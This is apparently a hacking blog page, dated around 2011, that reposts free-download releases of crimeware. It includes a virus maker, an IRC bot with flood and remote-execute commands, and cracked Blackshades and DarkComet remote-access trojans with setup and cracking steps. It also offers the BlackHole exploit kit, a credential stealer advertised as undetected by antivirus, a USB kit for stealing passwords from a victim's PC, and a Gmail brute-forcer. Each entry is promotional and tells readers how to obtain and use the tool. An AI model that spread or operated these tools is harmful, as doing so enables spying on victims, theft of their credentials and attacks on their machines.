Showing posts with label malware. Show all posts

DeadLine's Virus Maker 1.8.5(Free Download)

Hello !

DeadLine's Virus Maker 1.8.5 is a virus maker that I made because I do not trust all the other virus makers that are out there on the net. I worked on this for 8+ hours in total.
This application lets you create virusses, and you do not need to be a computer "geek" to do this. All you need, is this tool.

Features:
* Show a messagebox on startup
* Add to windows startup
* Close MSN
* Close Skype
* Close Yahoo
* Disable mouse
* Force shutdown
* Force restart
* Infinite beeping
* Infinite messageboxes
* Disconnect from the internet
* Disable firewall
* Disable CMD
* Disable taskmanager
* Disable regedit
* Random mouse movement
* Random keyboard keys sent
* Disable notepad
* And more !

Screenshot:





Credit:DeadLine From HF

Silly Bot 1.3.2 - C++ IRC Bot - New: Bugs Fixed from 1.3

Silly Bot 1.3.2




What's New:
1.3.2
Fixed Ping/Pong
Fixed Join Cmd
1.3.1
Fixed build issue on XP
Fixed .Remove and .Kill function on x86 - Injected thread will still be running until reboot. Bots will ping out of IRC.
1.3
Injects into explorer.exe if x86 detected - Runs hidden from task manger
Bin size reduced to ~35kb
Core recode to C (from C++), 99% in C with the exception of simple C++ syntax (So it compiles with WDK)
Builder offline again
Builder icon changed
Other stuff I can't think of... small changes

Features:
IRC Bot
Compiled in C++
Small Size ~35kb
Injects into explorer.exe if x86
Copies to %appdata% and Creates Startup Reg key
Backup DNS
Mutex
Auth Host

Commands:
.kill - Terminates it's own process
.execute <ip/dns> <name>
.udp <ip/dns> <time>
.http <ip/dns> <time>
.version
.remove
.update <ip/dns> <time>
.visit <ip/dns>
.dotnet <#chan> - If it has dotnet install it joins specified channel
.join <#chan>
.part
.recon - Reconnects to channel after 2 minutes


Download:

Bullshit rat cracked 4.7.1



beware!!
copied post from HF

**
**
** Blackshades 3.0~4.8 crack **
** **
** BY SRBIN!!! **
** **
** Tested with version 4.7.1 **
**
**
**
MANUAL http://pastebin.com/PqeYuqAx
DOWNLOAD THIS http://www.multiupload.com/R8ZG4OC7IU
Download http://www.apachefriends.org/en/xampp-windows.html
Download http://bshades.eu/4.7.1.rar password for the archive is blackshades
Download http://bshades.eu/HWID.exe
Download and install MySQL ODBC connector from here http://dev.mysql.com/downloads/connector/odbc
I suggest you to go with older XAMPP 1.6.x because you will need VC++2008 redist or later to set leatest version to run.
Add the following line in "hosts" file located here C:\WINDOWS\system32\drivers\etc
127.0.0.1 blackshades.ru
**
MySQL database details to set:
Username: root
Password: Uh77yerJ83nX
Create database named -> bss_net
bss_net is the database necessary for rat to authenticate;
Create database named -> bs_fusion
Create database named -> bs_proxy
Creation of these two database will prevent error boxes, i didn't provided table structure because they are not needed for rat.
Import the database backup files provided for each database respectively.
**
Run HWID.exe and go to database bss_net in table accounts and replace hwid column value of -11 with generated one (just paste it)
Start file server4.7.1 (login server)
**
Start Blackshades RAT 4.7.1 (client.exe) and login with username -> srbin and password -> krek if needed
**
For RAT version 4.8:
Download this and install http://sourceforge.net/projects/pjs-passport/
forward these ports using TCP protocol:
127.0.0.1:8203 ==> 127.0.0.1:8201
127.0.0.1:8204 ==> 127.0.0.1:8202
**
For older version:
DB password is the same, its just port forwarding that is necessary but I might release all login servers.
Only 4.8 has different database password but like described before, it can be bypassed with port forwarding, use netsat to examine in details.

BlackHole Exploit Kit 1.0.2 - Free Download!

First Public Release of BlackHole Exploit Kit. BlackHole exploit kit is yet another in an ongoing wave of attack toolkits flooding the underground market. The kit first appeared on the crimeware market in September of 2010 and ever since then has quickly been gaining market share over its vast number of competitors. In fact, many antivirus vendors now claim that this is one of the most prevalent exploit kits used in the wild. Even Malware Domain List is showing quite a few domains infected with the BlackHole exploit kit.
Black Market Cost : Users can purchase the annual license for $1500, semi-annual license for $1000, or just a quarterly license for $700. The license includes free software updates for the duration of the contract. For those malicious users with a commitment phobia the makers of the kit offer yet another solution. You can rent the kit (on the author’s servers) for $50 for 24 hours, $200 for 1 week, $300 for 2 weeks, $400 for 3 week, and $500 for 4 weeks. A domain name comes included with the rental agreement, but should you desire to change it you need to pay another $35. But Now its FREE HERE ! Feature : One highly touted feature of BlackHole toolkit is its TDS or Traffic Direction Script. While this is not an entirely new concept in attack toolkits the TDS included her is much more sophisticated and powerful than those in other kits. A TDS is basically an engine that allows redirection of traffic through a set of rules. For example, a user can set up a set of rules that redirect flow to different landing pages on their domain. These rules could be based on operating system, browser, country of origin, exploit, files, etc. One rule might redirect traffic to page A for all users that are running Windows OS from XP to Vista and running IE 8, while another rule can redirect Windows 7 users to page B. Those were just simple example rules. More advanced rules could set expiration dates for certain payloads and replace them with new ones when the date is reached. The TDS included in BlackHole even goes the extra step and allows you to create traffic flows based on these rules and provides management interface for the flows. A savvy malicious user with a lot of experience could easily utilize this rule engine to increase their infection numbers.From a web application standpoint BlackHole is built just like other kits, consisting of a PHP and MySQL backend. Since the majority of web servers run on the LAMP stack this enabled for very easy application deployment. The user interface for this kit is a cut about the rest, and it definitely looks nicer than almost any other attack kit we’ve analyzed. It resembles some of the best legitimate web apps we see in the world of commercial software.

Download

Credit: Hack News

[RELEASE] DarkComet-RAT 4.2F Updated Bugs Fixed!

Here is the final version of 4.2 (DarkComet-RAT).
It is now more stable, many bugs was fix, many things had changed etc.

Changelog:

- Now server module doesn't melt each times
- SOCKS5 Server added - Multithread.
- Camera streaming is now more stable
- Camera capture interval added
- Camera disable streatch enabled/disabled added
- File Manager doesn't crash on transfer anymore
- Sound capture more stable and a bit faster
- New process manager GUI and more user friendly
- Process Dump added to the new process manager
- Screen capture totally recoded, faster in Vista and Seven than before
- Screen capture control more stable
- No more black screen in screen capture on resize (avoid using 16bit colors in some systems) Most performant is 8Bit.
- New password recovery plugin
- I change the default path of installation to bypass UAC
- Keylogger is now by default always enabled.
- Webcam streaming is faster but use more CPU (but it is faster) if you want to use less CPU you will need to play
with the capture interval, bigger it is in time less CPU it will consume. (nowadays computers handle perfectly this
calculation so it might not cause some problems brotha )
- Webcam gui change, its more sex now.
- Webcam refresh button added if in the first time you don't receive the drivers list
- Remote desktop faster using another compression for picture use a little mit more CPU but faster
- Remote desktop now compare previous frame like in my previous versions (it use a special way that spent 0Ms to compare )
- Remote desktop i add as requested an option in remote command to save snapshots like for webcam
Bug fix:
- Get keylogger logs fixed
- Remote shell I/O error fixed
- bug fixed in computer information "Computer power / type"
- Process manager bug fixed, now it list correctly all process for 64bit and refresh work properly
- Process memory size bug fixed
- Process manager run visible/hidden bug fixed.
- Little bug in Uninstall application fix (when there is a param merged to the uninstall string it will work )
- Bug fixed in html, vbs, batch copy / past clipboard fixed
- Bug fixed in password manager when copy line / all in clipboard or copy only data4 column.
- Trace route bug fixed, now its working like a charm
- Now url download works fine in any case of url (i make valid your urls)
- No ip retrieve correctly the IP (no more 0 at the end)
- HWID works fine now, it will fix many errors in some functions
I would like to thanks especially Supersurfer beta testing also Nicolas.M.

Few pictures :












Download: ClickHere

Syslogger Beta [FUD] [Stealer/Clipboard logger + more]

About

I decided to release the Beta version of my logger (Syslogger). As you may notice, I didn't work on the GUI, since it's only a Beta. It's free and there will probably bugs that needs a fix, so that's why I want people to use it.

Screenshot

[Image: naamloosizf.png]

Virus scan

Builder:
File Info

Report date: 2011-06-15 16:34:56 (GMT 1)
File name: syslogger-builder-exe
File size: 900096 bytes
MD5 Hash: 76cbae1bb4ad08e5782b9b822df8855b
SHA1 Hash: 1c7220e2075973fbd76c2b7421174cbbe8750c3b
Detection rate: 0 on 5 (0%)
Status: CLEAN

Detections

AVG -
Avira AntiVir -
ClamAV -
Emsisoft -
TrendMicro -

Scan report generated by
NoVirusThanks.org

Stub:
File Info

Report date: 2011-06-16 20:50:07 (GMT 1)
File name: syslogger-stub-exe
File size: 444416 bytes
MD5 Hash: 8ad15345ddd77290a32d19350c3fae6e
SHA1 Hash: 5a7f7880e9c67117be54e79ff58b9fdaf6a8c3b4
Detection rate: 0 on 5 (0%)
Status: CLEAN

Detections

AVG -
Avira AntiVir -
ClamAV -
Emsisoft -
TrendMicro -

Scan report generated by
NoVirusThanks.org


Download: HERE
NEW VERSION RELEASED!
http://openhacking.blogspot.com/2011/11/syslogger-beta-035-fud-stealers.html


Credits

- Soulcollector
- EVO

USB Thief Modified

USB Thief Modified

Came across this tool and thought id share.

USB Thief Modified

--------------------------------
|************************
|* USBThief_Modified_by_NEO *|
|************************
|************************
|* JUST PLUG IT AND NJOY *|
|************************
--------------------------------

USB Steals Pc Passwords
Tweaked USB that steals every passwords including licences.

Instructions:
1.Decompress the archive and put all the files located in the folder "COPY"into a USB.
2.now run the file "hideh.bat"(this makes the files totaly hiden which can not be seen even using show hide option).
3.now delete the fie "hideh.bat"

-----------------------------------------------
-----------NOW UR READY FOR WORK-----------
-----------------------------------------------
Wht Next??---Simple
just plug the USB drive into victims pc open up wait for 4 sec and done...


----------------------------------------------
-----------HOW TO SEE THE DATA?------------
----------------------------------------------

When u decompressed the archive it created folder named "USBThief_Modified_by_NEO"
go in it
there will b file "showh.bat"
just copy it to usb and double click on it
now refresh
and u will see the all folders in USB
open "IMNeoWorld"
done,,,there u r .. got it??



---------------------------------
----------- FEATURE ------------
---------------------------------

Visited Links List
Internet Explorer Cache List
Internet Explorer Passwords List
Instant Messengers Accounts List
Installed Windows Updates List
Mozilla Cache List
Cookies List
Mozilla History List
Instant Messengers Accounts List
Search Queries List
Adapters Report
Network Passwords List
TCP/UDP Ports List
Product Key List
Protected Storage Passwords List
PST Passwords List
Startup Programs List
Video Cache List

download:

Code:
http://adf.ly/1DEqb

PolyDex v2 Gmail Password Cracker [Free]

[Image: im2nUA.png]
PolyDex v2 gmail cracker

Image really describes how to work it...

This is a bruteforcer. it can take hours,days,years to crack a pass so dont complain about the speed of it.

  • BruteForces Gmail's
  • Bypasses SMTP
  • Multiple Character Sets
  • Easy to use
  • MultiThreaded

NOTE:
This might use quite a bit of cpu and will use quite a bit of internet.

How it works (Advanced users only please)
Basically the permutation engine from my md5 cracker generates strings sequentially then it attempts to send a smtp message using the generated string, if it fails it continues trying to send smtp messages. If an email sends it echos back the password and stops cracking. This concept could be adapted to any SMTP provider email you want, if you'd like the source your free to contact me via pm and im down for sharing.

Download Here!
Source Download here!

Scan
(Obfucation, If you dont like it.. dont download)

If you understand visual basic you would realize that to send the email using SMTP that I use to crack the email I have to use the email namespace which is detected as its also used in malware to send information.

RESULTS: 2/33
AVG Free -
ArcaVir -
Avast 5 -
Avast -
AntiVir (Avira) -
BitDefender -
VirusBuster -
Clam -
COMODO -
Dr.Web -
eTrust-Vet -
F-PROT -
F-Secure -
G Data -
IKARUS - Trojan.ATRAPS
Kaspersky -
McAfee -
MS Essentials -
ESET NOD32 -
Norman -
Norton -
Panda -
A-Squared - Trojan.ATRAPS!IK
Quick Heal -
Rising -
Solo -
Sophos -
Trend Micro -
VBA32 -
Vexira -
Webroot -
Zoner AntiVirus -
AhnLab V3 -

File Имя PolyDexv2.exe
File Size: 96768
File MD5: 403dc8262c093b30a043bba4d70e3cf5
File SHA1: b99bdd2e6f76087a456ea648b8bd4934899678f5
Check Time: 2011-03-20 08:45:52

Scan report generated by
Scan4You.Biz

[UPDATE] Umbra Loader Panel 0.1.1

[UPDATE] Umbra Loader Panel 0.1.1



Changelog:
-Now you see Online Loads
-Bugfixes

If you already have an existing webpanel, delete everything and reinstall the whole panel again (bots dont needed to be updated, old version is 100% compitable).

Installation Instructions included!

Download:
http://schwarzesonne.svn.sourceforge...ader/?view=tar

Delphi Download (needed):
Delphi 7 Second Edition v7.2

Tutorial:
http://www.youtube.com/watch?v=az-0F571620